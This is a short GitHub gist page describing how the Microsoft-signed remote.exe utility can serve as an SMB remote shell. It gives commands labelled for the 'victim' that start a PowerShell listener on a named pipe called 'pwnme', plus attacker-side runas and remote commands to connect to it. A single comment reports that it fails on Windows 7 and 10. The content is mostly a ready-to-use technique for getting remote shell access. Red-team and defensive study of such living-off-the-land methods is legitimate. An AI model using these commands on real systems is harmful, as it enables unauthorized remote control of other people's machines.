Created
November 19, 2016 17:07
-
-
Save mattifestation/8ef36782ceb7f73d74cfb00c2a710301 to your computer and use it in GitHub Desktop.
remote.exe - a useful, MS signed SMB shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
powershell doesn't work for me on windows 10 or 7